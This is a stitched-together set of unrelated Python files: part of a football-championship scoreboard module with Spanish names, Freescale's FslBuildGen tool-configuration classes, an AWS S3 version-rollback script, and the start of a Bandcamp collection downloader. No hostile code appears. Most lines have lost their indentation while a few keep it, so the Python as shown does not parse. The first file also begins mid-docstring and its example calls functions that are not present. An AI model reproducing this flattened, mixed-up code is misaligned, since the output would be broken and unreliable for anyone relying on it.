    This function computes the total number of matches played in the championship.
    Parameters:
    tablero_goles (list): matrix containing the goals board.
    Returns: int
    The total number of matches played in the championship.
"""
jugados = 0
for fila in tablero_goles:
for columna in fila:
if columna != -1 and columna != -2:
jugados += 0.5
return int(jugados)
def equipo_mas_goleador(tablero_goles: list, equipos: dict) -> str:
"""
    This function returns the name of the team that has scored the most goals in the
    championship
    Parameters:
    tablero_goles (list): matrix containing the goals board
    equipos (dict): dictionary of the teams in the championship
    Returns: str
    The name of the highest-scoring team of the championship
"""
goleador = "Ninguno"
goles_goleador = 0
nombre_equipos = []
    # Add the team names to a list.
for equipo in equipos:
nombre_equipos.append(equipo)
    # Sweep the board rows to find the top-scoring team.
i = 0
for fila in tablero_goles:
goles_equipo = 0
for columna in fila:
if columna != -1 and columna != -2:
goles_equipo += columna
if goles_goleador < goles_equipo:
goles_goleador = goles_equipo
goleador = nombre_equipos[i]
i += 1
return goleador
def equipo_mas_goleado(tablero_goles: list, equipos: dict) -> str:
"""
    This function returns the name of the team that has conceded the most goals in the
    championship
    Parameters:
    tablero_goles (list): matrix containing the goals board
    equipos (dict): dictionary of the teams in the championship
    Returns: str
    The name of the team with the most goals conceded in the championship
"""
goleado = "Ninguno"
nombre_equipos = list(equipos.keys())
goles_goleado = 0
    # Sweep the board columns to find the team with the most goals conceded.
i = 0
while i < len(tablero_goles):
goles = 0
j = 0
while j < len(tablero_goles):
if tablero_goles[j][i] != -1 and tablero_goles[j][i] != -2:
goles += tablero_goles[j][i]
j += 1
if goles_goleado < goles:
goles_goleado = goles
goleado = nombre_equipos[i]
i += 1
return goleado
def partidos_empatados(tablero_goles: list) -> int:
"""
    This function computes the total number of matches that ended in a draw in the championship
    Parameters:
    tablero_goles (list): matrix containing the goals board
    Returns: int
    The total number of drawn matches in the championship
"""
tied = 0
for i in range(0, len(tablero_goles)):
for j in range(i + 1, len(tablero_goles[0])):
if tablero_goles[i][j] == tablero_goles[j][i] and tablero_goles[j][i] >= 0:
tied += 1
return tied
def mayor_numero_goles(tablero_goles: list) -> int:
"""
    This function computes the highest number of goals scored in a single match of the championship
    (adding the goals of both teams)
    Parameters:
    tablero_goles (list): matrix containing the goals board
    Returns: int
    The highest number of goals scored in a match of the championship
"""
maximo_goles = 0
for i in range(0, len(tablero_goles)):
for j in range(i + 1, len(tablero_goles[0])):
total_goles_actual = tablero_goles[i][j] + tablero_goles[j][i]
if total_goles_actual > maximo_goles:
maximo_goles = total_goles_actual
return maximo_goles
def is_goleada(tabla_goles: list) -> bool:
    """
    This function indicates whether any match in the championship was a rout,
    i.e. decided by a difference of 3 or more goals.
    Parameters:
    tabla_goles (list): matrix containing the goals board
    Returns: bool
    True if at least one match was won by 3 or more goals
    """
    it_is = False
i = 0
while i < len(tabla_goles) and not it_is:
j = i + 1
while j < len(tabla_goles[0]) and not it_is:
diference = abs(tabla_goles[i][j] - tabla_goles[j][i])
if diference >= 3:
it_is = True
j += 1
i += 1
return it_is
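# Hedged usage example (added for illustration; the -1/-2 sentinel values match the checks
# in the functions above and are assumed to mark unplayed matches and the diagonal):
if __name__ == "__main__":
    equipos = {"Rojo": 0, "Azul": 1, "Verde": 2}
    tablero = [[-2, -1, -1],
               [-1, -2, -1],
               [-1, -1, -2]]
    anotar_marcador(tablero, equipos, "Rojo", "Azul", "3-0")
    anotar_marcador(tablero, equipos, "Azul", "Verde", "2-2")
    print(total_goles(tablero))                   # 7
    print(partidos_jugados(tablero))              # 2
    print(equipo_mas_goleador(tablero, equipos))  # Rojo
    print(is_goleada(tablero))                    # True (3-0 is a margin of 3)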
|
#!/usr/bin/env python3
#****************************************************************************************************************************************************
# Copyright (c) 2014 Freescale Semiconductor, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the Freescale Semiconductor, Inc. nor the names of
# its contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#****************************************************************************************************************************************************
from typing import Dict
from typing import List
from typing import Optional
from typing import Set
from typing import Union
import os
import os.path
from FslBuildGen import IOUtil
from FslBuildGen import Util
from FslBuildGen.BasicConfig import BasicConfig
from FslBuildGen.DataTypes import CompilerNames
from FslBuildGen.DataTypes import MagicStrings
from FslBuildGen.DataTypes import PackageRequirementTypeString
from FslBuildGen.DataTypes import VisualStudioVersion
from FslBuildGen.Exceptions import DuplicatedConfigContentBuilder
from FslBuildGen.Exceptions import DuplicatedConfigPackageLocation
from FslBuildGen.Exceptions import DuplicatedConfigRootPath
from FslBuildGen.Exceptions import DuplicatedNewProjectTemplatesRootPath
from FslBuildGen.Exceptions import UsageErrorException
from FslBuildGen.ToolConfigExperimental import ToolConfigExperimental
from FslBuildGen.ToolConfigRootDirectory import ToolConfigRootDirectory
from FslBuildGen.Vars.VariableProcessor import VariableProcessor
from FslBuildGen.Xml.Exceptions import XmlException2
from FslBuildGen.Xml.Exceptions import XmlDuplicatedCompilerConfigurationException
from FslBuildGen.Xml.Exceptions import XmlUnsupportedCompilerVersionException
from FslBuildGen.Xml.ToolConfig.XmlConfigFileAddNewProjectTemplatesRootDirectory import XmlConfigFileAddNewProjectTemplatesRootDirectory
from FslBuildGen.Xml.ToolConfig.XmlConfigPackageConfiguration import XmlConfigPackageConfiguration
from FslBuildGen.Xml.ToolConfig.XmlConfigPackageLocation import FakeXmlConfigPackageLocation
from FslBuildGen.Xml.ToolConfig.XmlConfigPackageLocation import XmlConfigPackageLocation
from FslBuildGen.Xml.XmlProjectRootConfigFile import XmlConfigCompilerConfiguration
from FslBuildGen.Xml.XmlProjectRootConfigFile import XmlConfigFileAddRootDirectory
from FslBuildGen.Xml.XmlProjectRootConfigFile import XmlExperimental
from FslBuildGen.Xml.XmlProjectRootConfigFile import XmlProjectRootConfigFile
from FslBuildGen.Xml.XmlToolConfigFile import XmlConfigContentBuilder
from FslBuildGen.Xml.XmlToolConfigFile import XmlConfigContentBuilderConfiguration
from FslBuildGen.Xml.XmlToolConfigFile import XmlConfigFileAddTemplateImportDirectory
from FslBuildGen.Xml.XmlToolConfigFile import XmlConfigFileTemplateFolder
from FslBuildGen.Xml.XmlToolConfigFile import XmlToolConfigFile
class ToolConfigCompilerConfiguration(object):
def __init__(self, basicConfig: BasicConfig, basedUponXML: XmlConfigCompilerConfiguration) -> None:
super(ToolConfigCompilerConfiguration, self).__init__()
self.BasedOn = basedUponXML
self.Name = self.BasedOn.Name
self.Id = self.BasedOn.Id
self.Platform = self.BasedOn.Platform
defaultVersion = VisualStudioVersion.TryParse(self.BasedOn.DefaultVersion)
if defaultVersion is None:
raise XmlUnsupportedCompilerVersionException(self.BasedOn.XMLElement, self.BasedOn.Name, self.BasedOn.DefaultVersion, ', '.join(str(x) for x in VisualStudioVersion.AllEntries))
self.DefaultVersion = defaultVersion
class ToolConfigTemplateFolder(object):
def __init__(self, basicConfig: BasicConfig, basedUponXML: XmlConfigFileTemplateFolder) -> None:
super(ToolConfigTemplateFolder, self).__init__()
self.BasedOn = basedUponXML
self.Name = self.BasedOn.Name
variableProcessor = VariableProcessor(basicConfig)
self.ResolvedPath = variableProcessor.ResolveAbsolutePathWithLeadingEnvironmentVariablePathAsDir(self.Name)
class NewProjectTemplateRootDirectory(object):
def __init__(self, basicConfig: BasicConfig, basedUponXML: XmlConfigFileAddNewProjectTemplatesRootDirectory) -> None:
super(NewProjectTemplateRootDirectory, self).__init__()
self.BasedOn = basedUponXML
self.Id = basedUponXML.Id
self.Name = basedUponXML.Name
self.DynamicName = basedUponXML.Name
variableProcessor = VariableProcessor(basicConfig)
# NOTE: workaround Union of tuples not being iterable bug in mypy https://github.com/python/mypy/issues/1575
tupleResult = variableProcessor.TryExtractLeadingEnvironmentVariableNameAndPath(self.DynamicName, True)
env = tupleResult[0]
remainingPath = tupleResult[1]
if env is None:
raise Exception("Root dirs are expected to contain environment variables '{0}'".format(self.DynamicName))
resolvedPath = IOUtil.GetEnvironmentVariableForDirectory(env) + remainingPath
self.BashName = '${0}{1}'.format(env, remainingPath)
self.DosName = '%{0}%{1}'.format(env, remainingPath)
self.ResolvedPath = IOUtil.ToUnixStylePath(resolvedPath)
self.ResolvedPathEx = "{0}/".format(self.ResolvedPath) if len(self.ResolvedPath) > 0 else ""
self.__EnvironmentVariableName = env
class ToolConfigDirectory(object):
def __init__(self, basicConfig: BasicConfig, basedUponXML: XmlConfigFileAddTemplateImportDirectory) -> None:
super(ToolConfigDirectory, self).__init__()
self.BasedOn = basedUponXML
self.Name = self.BasedOn.Name
variableProcessor = VariableProcessor(basicConfig)
# NOTE: workaround Union of tuples not being iterable bug in mypy https://github.com/python/mypy/issues/1575
tupleResult = variableProcessor.TrySplitLeadingEnvironmentVariablesNameAndPath(self.Name)
envName = tupleResult[0]
rest = tupleResult[1]
if envName is None:
raise Exception("Template import dirs are expected to contain environment variables")
self.DecodedName = envName
self.BashName = IOUtil.Join('$' + self.DecodedName, rest)
self.DosName = IOUtil.Join('%' + self.DecodedName + '%', rest)
if self.Name is None:
raise XmlException2(basedUponXML.XmlElement, "Dirs are expected to contain environment variables")
self.ResolvedPath = IOUtil.Join(IOUtil.GetEnvironmentVariableForDirectory(self.DecodedName), rest)
self.ResolvedPathEx = "{0}/".format(self.ResolvedPath) if len(self.ResolvedPath) > 0 else ""
# TODO: improve interface, don't allow so many None (remove None from rootDirs and projectRootDirectory)
class ToolConfigLocation(object):
def __init__(self, basicConfig: BasicConfig,
rootDirs: Optional[List[ToolConfigRootDirectory]],
basedUponXML: XmlConfigPackageLocation,
projectRootDirectory: Optional[str],
resolvedPath: Optional[str] = None) -> None:
super(ToolConfigLocation, self).__init__()
if rootDirs is None or projectRootDirectory is None:
if rootDirs is not None or projectRootDirectory is not None:
raise Exception("When rootDirs is none, then the projectRootDirectory must be none")
self.BasedOn = basedUponXML
self.Id = basedUponXML.Id
self.Name = basedUponXML.Name
if resolvedPath is not None:
self.ResolvedPath = IOUtil.NormalizePath(resolvedPath)
else:
if rootDirs is None or projectRootDirectory is None:
raise Exception("When resolvedPath is None then rootDirs and projectRootDirectory can not be None")
self.ResolvedPath = self.__ResolvePath(basicConfig, rootDirs, self.Name, projectRootDirectory)
self.ResolvedPathEx = "{0}/".format(self.ResolvedPath) if len(self.ResolvedPath) > 0 else ""
self.ScanMethod = basedUponXML.ScanMethod
def __ResolvePath(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory], entryName: str, projectRootDirectory: str) -> str:
rootDir = self.__LocateRootDir(basicConfig, rootDirs, entryName, projectRootDirectory)
return entryName.replace(rootDir.Name, rootDir.ResolvedPath)
def __LocateRootDir(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory], entryName: str, projectRootDirectory: str) -> ToolConfigRootDirectory:
if projectRootDirectory is None or not entryName.startswith(MagicStrings.ProjectRoot):
for rootDir in rootDirs:
if entryName.startswith(rootDir.Name):
return rootDir
else:
# Lets try to locate a root directory which the project is based in,
# then use it to dynamically add a new allowed root directory based on the project file location
for rootDir in rootDirs:
if projectRootDirectory == rootDir.ResolvedPath:
return ToolConfigRootDirectory(basicConfig, None, rootDir, MagicStrings.ProjectRoot, rootDir.ResolvedPath)
elif projectRootDirectory.startswith(rootDir.ResolvedPathEx):
dynamicRootDir = projectRootDirectory[len(rootDir.ResolvedPathEx):]
dynamicRootDir = "{0}/{1}".format(rootDir.Name, dynamicRootDir)
return ToolConfigRootDirectory(basicConfig, None, rootDir, MagicStrings.ProjectRoot, dynamicRootDir)
raise Exception("Path '{0}' is not based on one of the valid root directories {1}".format(entryName, ", ".join(Util.ExtractNames(rootDirs))))
class ToolConfigPackageLocationBlacklistEntry(object):
def __init__(self, sourceRootPath: str, relativePath: str) -> None:
self.RootDirPath = IOUtil.NormalizePath(sourceRootPath)
self.RelativeDirPath = IOUtil.NormalizePath(relativePath)
self.AbsoluteDirPath = IOUtil.Join(sourceRootPath, relativePath)
# TODO: improve interface, don't allow so many None (remove None from rootDirs and projectRootDirectory)
class ToolConfigPackageLocation(ToolConfigLocation):
def __init__(self, basicConfig: BasicConfig,
rootDirs: Optional[List[ToolConfigRootDirectory]],
basedUponXML: XmlConfigPackageLocation,
projectRootDirectory: Optional[str],
resolvedPath: Optional[str] = None) -> None:
super(ToolConfigPackageLocation, self).__init__(basicConfig, rootDirs, basedUponXML, projectRootDirectory, resolvedPath)
self.Blacklist = [ToolConfigPackageLocationBlacklistEntry(self.ResolvedPath, entry.Name) for entry in basedUponXML.Blacklist]
class ToolConfigPackageConfigurationLocationSetup(object):
def __init__(self, name: str, scanMethod: Optional[int] = None, blacklist: Optional[List[str]] = None) -> None:
self.Name = name
self.ScanMethod = scanMethod
self.Blacklist = blacklist
ToolConfigPackageConfigurationAddLocationType = Union[str, ToolConfigPackageConfigurationLocationSetup, List[str], List[ToolConfigPackageConfigurationLocationSetup]]
class ToolConfigPackageConfiguration(object):
def __init__(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory],
basedUponXML: XmlConfigPackageConfiguration, configFileName: str, projectRootDirectory: str) -> None:
super(ToolConfigPackageConfiguration, self).__init__()
self.__basicConfig = basicConfig
self.BasedOn = basedUponXML
self.Name = basedUponXML.Name
self.Preload = basedUponXML.Preload
self.Locations = self.__ResolveLocations(basicConfig, rootDirs, basedUponXML.Locations, configFileName, projectRootDirectory)
def ClearLocations(self) -> None:
self.Locations = []
def AddLocations(self, newRootLocations: ToolConfigPackageConfigurationAddLocationType) -> None:
# done in two steps to make mypy happy
if isinstance(newRootLocations, str):
newRootLocations = [newRootLocations]
if isinstance(newRootLocations, ToolConfigPackageConfigurationLocationSetup):
newRootLocations = [newRootLocations]
for rootLocation in newRootLocations:
if isinstance(rootLocation, str):
resolvedPath = rootLocation
fakeXml = FakeXmlConfigPackageLocation(self.__basicConfig, rootLocation)
elif isinstance(rootLocation, ToolConfigPackageConfigurationLocationSetup):
resolvedPath = rootLocation.Name
fakeXml = FakeXmlConfigPackageLocation(self.__basicConfig, rootLocation.Name, rootLocation.ScanMethod, rootLocation.Blacklist)
else:
raise Exception("Unsupported type")
self.Locations.append(ToolConfigPackageLocation(self.__basicConfig, None, fakeXml, None, resolvedPath))
def __ResolveLocations(self, basicConfig: BasicConfig,
rootDirs: List[ToolConfigRootDirectory], locations: List[XmlConfigPackageLocation],
configFileName: str, projectRootDirectory: str) -> List[ToolConfigPackageLocation]:
# Check for unique names and
# convert to a ToolConfigPackageLocation list
res = [] # List[ToolConfigPackageLocation]
uniqueLocationIds = set() # type: Set[str]
for location in locations:
if not location.Id in uniqueLocationIds:
uniqueLocationIds.add(location.Id)
packageLocation = ToolConfigPackageLocation(basicConfig, rootDirs, location, projectRootDirectory)
res.append(packageLocation)
else:
raise DuplicatedConfigPackageLocation(location.Name, configFileName)
# We sort it so that the longest paths come first meaning we will always find the most exact match first
# if searching from the front to the end of the list and comparing to 'startswith'
res.sort(key=lambda s: -len(s.ResolvedPath))
return res
class ToolContentBuilder(object):
def __init__(self, basedUponXML: XmlConfigContentBuilder) -> None:
super(ToolContentBuilder, self).__init__()
self.BasedOn = basedUponXML
self.Name = basedUponXML.Name
self.Executable = basedUponXML.Executable
self.Parameters = basedUponXML.Parameters
self.FeatureRequirements = basedUponXML.FeatureRequirements
self.DefaultExtensions = basedUponXML.DefaultExtensions
self.Description = basedUponXML.Description
class ToolConfigContentBuilderConfiguration(object):
def __init__(self, basedUponXML: XmlConfigContentBuilderConfiguration, configFileName: str) -> None:
super(ToolConfigContentBuilderConfiguration, self).__init__()
self.BasedOn = basedUponXML
self.ContentBuilders = self.__ResolveContentBuilders(basedUponXML.ContentBuilders, configFileName) if basedUponXML else []
def __ResolveContentBuilders(self, contentBuilders: List[XmlConfigContentBuilder], configFileName: str) -> List[ToolContentBuilder]:
uniqueNames = set() # type: Set[str]
res = [] # type: List[ToolContentBuilder]
for contentBuilder in contentBuilders:
newContentBuilder = ToolContentBuilder(contentBuilder)
if not newContentBuilder.Name in uniqueNames:
uniqueNames.add(newContentBuilder.Name)
res.append(newContentBuilder)
else:
raise DuplicatedConfigContentBuilder(newContentBuilder.Name, configFileName)
return res
class ToolConfig(object):
def __init__(self, basicConfig: BasicConfig, filename: str, projectRootConfig: XmlProjectRootConfigFile) -> None:
super(ToolConfig, self).__init__()
basedUponXML = XmlToolConfigFile(basicConfig, filename, projectRootConfig)
self.BasedOn = basedUponXML
self.GenFileName = basedUponXML.GenFileName.Name
self.RootDirectories = self.__ResolveRootDirectories(basicConfig, basedUponXML.RootDirectories, filename)
self.TemplateImportDirectories = self.__ResolveDirectories(basicConfig, basedUponXML.TemplateImportDirectories)
self.PackageConfiguration = self.__ResolvePackageConfiguration(basicConfig, self.RootDirectories, basedUponXML.PackageConfiguration, filename, projectRootConfig.RootDirectory)
self.TemplateFolder = ToolConfigTemplateFolder(basicConfig, basedUponXML.TemplateFolder)
self.NewProjectTemplateRootDirectories = self.__ResolveNewProjectTemplateRootDirectories(basicConfig, basedUponXML.NewProjectTemplateRootDirectories)
self.ContentBuilderConfiguration = ToolConfigContentBuilderConfiguration(basedUponXML.ContentBuilderConfiguration, filename) if basedUponXML.ContentBuilderConfiguration is not None else None
self.UnitTestPath = self.__TryResolveUnitTestPath()
self.DefaultPackageLanguage = projectRootConfig.DefaultPackageLanguage
self.DefaultCompany = projectRootConfig.DefaultCompany
self.RequirePackageCreationYear = projectRootConfig.RequirePackageCreationYear
self.ProjectRootConfig = projectRootConfig
self.CompilerConfigurationDict = self.__ProcessCompilerConfiguration(basicConfig, basedUponXML.CompilerConfiguration)
self.RequirementTypes = [PackageRequirementTypeString.Extension, PackageRequirementTypeString.Feature]
self.Experimental = self.__ResolveExperimental(basicConfig, self.RootDirectories, basedUponXML.Experimental, filename, projectRootConfig.RootDirectory) # type: Optional[ToolConfigExperimental]
def GetVisualStudioDefaultVersion(self) -> int:
visualStudioId = CompilerNames.VisualStudio.lower()
if visualStudioId in self.CompilerConfigurationDict:
return self.CompilerConfigurationDict[visualStudioId].DefaultVersion
return VisualStudioVersion.DEFAULT
def TryLegacyToPath(self, path: Optional[str]) -> Optional[str]:
if path is None:
return None
return self.ToPath(path)
def ToPath(self, path: str) -> str:
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
for rootDir in self.RootDirectories:
if path.startswith(rootDir.ResolvedPathEx):
lenRootPath = len(rootDir.ResolvedPathEx)
path = path[lenRootPath:]
return rootDir.Name + "/" + Util.UTF8ToAscii(path)
elif path == rootDir.ResolvedPath:
return rootDir.Name + "/"
raise UsageErrorException("ERROR: the folder '{0}' does not reside inside one of the root dirs".format(path))
def TryFindRootDirectory(self, path: Optional[str]) -> Optional[ToolConfigRootDirectory]:
""" Try to find the nearest root directory """
if path is None:
return None
for rootDir in self.RootDirectories:
if path.startswith(rootDir.ResolvedPathEx) or path == rootDir.ResolvedPath:
return rootDir
return None
def ToBashPath(self, path: str) -> str:
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
for rootDir in self.RootDirectories:
if path.startswith(rootDir.ResolvedPathEx):
lenRootPath = len(rootDir.ResolvedPathEx)
path = path[lenRootPath:]
return rootDir.BashName + "/" + Util.UTF8ToAscii(path)
elif path == rootDir.ResolvedPath:
                return rootDir.BashName + "/"
raise UsageErrorException("ERROR: the folder '{0}' does not reside inside one of the root dirs".format(path))
def TryLegacyToBashPath(self, path: Optional[str]) -> Optional[str]:
if path is None:
return None
return self.ToBashPath(path)
def ToBashPathDirectConversion(self, path: str) -> str:
""" This does not make the path relative to a root path """
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
path = Util.ChangeToBashEnvVariables(path)
return Util.UTF8ToAscii(path).replace('\\', '/')
def TryLegacyToBashPathDirectConversion(self, path: Optional[str]) -> Optional[str]:
""" This does not make the path relative to a root path """
if path is None:
return None
return self.ToBashPathDirectConversion(path)
def ToDosPath(self, path: str) -> str:
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
for rootDir in self.RootDirectories:
if path.startswith(rootDir.ResolvedPathEx):
lenRootPath = len(rootDir.ResolvedPathEx)
path = path[lenRootPath:]
tmp = rootDir.DosName + "/" + Util.UTF8ToAscii(path)
return tmp.replace('/', '\\')
elif path == rootDir.ResolvedPath:
                tmp = rootDir.DosName + "/"
return tmp.replace('/', '\\')
raise UsageErrorException("ERROR: the folder '{0}' does not reside inside one of the root dirs".format(path))
def TryLegacyToDosPath(self, path: Optional[str]) -> Optional[str]:
if path is None:
return None
return self.ToDosPath(path)
def ToDosPathDirectConversion(self, path: str) -> str:
""" This does not make the path relative to a root path """
if path.find("\\") >= 0:
raise UsageErrorException("Backslash found in the supplied path '{0}'".format(path))
path = Util.ChangeToDosEnvironmentVariables(path)
return Util.UTF8ToAscii(path).replace('/', '\\')
def TryLegacyToDosPathDirectConversion(self, path: Optional[str]) -> Optional[str]:
""" This does not make the path relative to a root path """
if path is None:
return None
return self.ToDosPathDirectConversion(path)
def __ResolveNewProjectTemplateRootDirectories(self, basicConfig: BasicConfig,
newProjectTemplateRootDirectories: List[XmlConfigFileAddNewProjectTemplatesRootDirectory]) -> List[NewProjectTemplateRootDirectory]:
uniqueIdDict = {} # type: Dict[str, NewProjectTemplateRootDirectory]
rootDirs = [] # type: List[NewProjectTemplateRootDirectory]
for rootDir in newProjectTemplateRootDirectories:
toolRootDir = NewProjectTemplateRootDirectory(basicConfig, rootDir)
if not toolRootDir.Id in uniqueIdDict:
uniqueIdDict[toolRootDir.Id] = toolRootDir
rootDirs.append(toolRootDir)
else:
raise DuplicatedNewProjectTemplatesRootPath(toolRootDir.Name, uniqueIdDict[toolRootDir.Id].Name, toolRootDir.Name)
# We sort it so that the longest paths come first meaning we will always find the most exact match first
# if searching from the front to the end of the list and comparing to 'startswith'
rootDirs.sort(key=lambda s: -len(s.ResolvedPathEx))
return rootDirs
def __ResolveRootDirectories(self, basicConfig: BasicConfig,
rootDirectories: List[XmlConfigFileAddRootDirectory],
configFileName: str) -> List[ToolConfigRootDirectory]:
uniqueNames = set() # type: Set[str]
rootDirs = [] # type: List[ToolConfigRootDirectory]
for rootDir in rootDirectories:
toolRootDir = ToolConfigRootDirectory(basicConfig, rootDir)
if not toolRootDir.Name in uniqueNames:
uniqueNames.add(toolRootDir.Name)
rootDirs.append(toolRootDir)
else:
raise DuplicatedConfigRootPath(toolRootDir.Name, configFileName)
# We sort it so that the longest paths come first meaning we will always find the most exact match first
# if searching from the front to the end of the list and comparing to 'startswith'
rootDirs.sort(key=lambda s: -len(s.ResolvedPathEx))
return rootDirs
def __ResolveDirectories(self, basicConfig: BasicConfig, directories: List[XmlConfigFileAddTemplateImportDirectory]) -> List[ToolConfigDirectory]:
dirs = [] # type: List[ToolConfigDirectory]
for dirEntry in directories:
dirs.append(ToolConfigDirectory(basicConfig, dirEntry))
return dirs
def __ResolvePackageConfiguration(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory],
packageConfiguration: Dict[str, XmlConfigPackageConfiguration],
configFileName: str, projectRootDirectory: str) -> Dict[str, ToolConfigPackageConfiguration]:
        configs = {}  # type: Dict[str, ToolConfigPackageConfiguration]
for packageConfig in list(packageConfiguration.values()):
resolvedConfig = ToolConfigPackageConfiguration(basicConfig, rootDirs, packageConfig, configFileName, projectRootDirectory)
configs[resolvedConfig.Name] = resolvedConfig
return configs
def __ResolveExperimental(self, basicConfig: BasicConfig, rootDirs: List[ToolConfigRootDirectory],
experimental: Optional[XmlExperimental],
configFileName: str, projectRootDirectory: str) -> Optional[ToolConfigExperimental]:
if experimental is None:
return None
return ToolConfigExperimental(basicConfig, rootDirs, experimental, configFileName, projectRootDirectory)
def __TryResolveUnitTestPath(self) -> Optional[str]:
path = os.environ.get("FSL_GRAPHICS_INTERNAL")
if path is None:
return None
return IOUtil.Join(path, "Tools/FslBuildGen/FslBuildGen/UnitTest/TestFiles")
def __ProcessCompilerConfiguration(self, basicConfig: BasicConfig,
xmlCompilerConfiguration: List[XmlConfigCompilerConfiguration]) -> Dict[str, ToolConfigCompilerConfiguration]:
result = {} # type: Dict[str, ToolConfigCompilerConfiguration]
for config in xmlCompilerConfiguration:
if config.Id in result:
raise XmlDuplicatedCompilerConfigurationException(result[config.Id].BasedOn.XMLElement, result[config.Id].Name, config.XMLElement, config.Name)
elif config.Name == CompilerNames.VisualStudio:
result[config.Id] = ToolConfigCompilerConfiguration(basicConfig, config)
else:
msg = "CompilerConfiguration name: '{0}' is not currently supported, so entry is ignored".format(config.Name)
basicConfig.LogPrint(msg)
return result
|
#!/usr/bin/python
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
import json
import logging
import os
import argparse
from common import PARTITION_TO_MAIN_REGION, PARTITIONS, retrieve_sts_credentials
from s3_factory import S3DocumentManager
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s [%(name)s] %(message)s")
def execute_rollback(rollback_file_path, sts_credentials, deploy):
with open(rollback_file_path) as rollback_file:
rollback_data = json.load(rollback_file)
logging.info("Loaded rollback data:\n%s", json.dumps(rollback_data, indent=2))
# Rollback file format
# {
# "s3_bucket": {
# "region": "us-east-1",
# "files": {
# "object_key": "version_id"
# }
# },
# ...
# }
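    # A purely illustrative example of such a rollback file (bucket name,
    # object key and version id below are made up):
    # {
    #     "example-templates-bucket": {
    #         "region": "us-east-1",
    #         "files": {
    #             "templates/network.cfn.json": "3HL4kqCxf3vjVBH40Nrjfkd934kd"
    #         }
    #     }
    # }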
for bucket_name, bucket_rollback_data in rollback_data.items():
region = bucket_rollback_data["region"]
for file, version in bucket_rollback_data["files"].items():
object_manager = S3DocumentManager(region, sts_credentials.get(region))
object_manager.revert_object(bucket_name, file, version, not deploy)
def _parse_args():
def _aws_credentials_type(value):
return tuple(value.strip().split(","))
def _json_file_type(value):
if not os.path.isfile(value):
raise argparse.ArgumentTypeError("'{0}' is not a valid file".format(value))
with open(value) as rollback_file:
json.load(rollback_file)
return value
parser = argparse.ArgumentParser(description="Rollback S3 files to a previous version")
parser.add_argument(
"--rollback-file-path",
help="Path to file containing the rollback information",
type=_json_file_type,
required=True,
)
parser.add_argument(
"--deploy",
action="store_true",
help="If deploy is false, we will perform a dryrun and no file will be pushed to buckets",
default=False,
required=False,
)
parser.add_argument(
"--credentials",
help="STS credential endpoint, in the format <region>,<endpoint>,<ARN>,<externalId>."
"Could be specified multiple times",
required=False,
nargs="+",
type=_aws_credentials_type,
default=[],
)
parser.add_argument(
"--partition", choices=PARTITIONS, help="AWS Partition where to update the files", required=True
)
args = parser.parse_args()
return args
def main():
args = _parse_args()
logging.info("Parsed cli args: %s", vars(args))
regions = set()
with open(args.rollback_file_path) as rollback_file:
rollback_data = json.load(rollback_file)
for bucket in rollback_data.keys():
regions.add(rollback_data[bucket]["region"])
sts_credentials = retrieve_sts_credentials(args.credentials, PARTITION_TO_MAIN_REGION[args.partition], regions)
execute_rollback(args.rollback_file_path, sts_credentials, args.deploy)
if __name__ == "__main__":
main()
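# Example invocation (values are illustrative; the script name is assumed and
# the partition must be one of the entries in PARTITIONS):
#   python s3_rollback.py --rollback-file-path rollback.json --partition aws --deploy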
|
from docopt import docopt
from os.path import isfile
from datetime import datetime
import locale
import asyncio
import json
from colorama import Fore, ansi
from .bandcamp import Bandcamp
DOC = """
Camp Collective.
Usage:
camp-collective -c=<cookie>... [options] download-collection [<target-directory>]
Options:
--cookie=<cookie> -c Cookies used to authenticate with Bandcamp (split by ; and content url encoded)
--parallel=<amount> -p Amount of items that should be downloaded parallel [default: 5]
--status=<status-file> -s Status file to save the status in of downloaded releases, so we don't over do it
--format=<file-format> -f File format to download (%s) [default: flac]
--after=<date> Only download tralbums that are purchased after given date, given in YYYY-MM-DD
""" % ', '.join(Bandcamp.FORMATS.keys())
data = docopt(DOC)
async def _main(data):
    # force the 'C' locale so parsing/formatting below is locale-independent
locale.setlocale(locale.LC_ALL, 'C')
cookie_string = ';'.join(data['--cookie']).strip(' ;')
def parse_cookie(string):
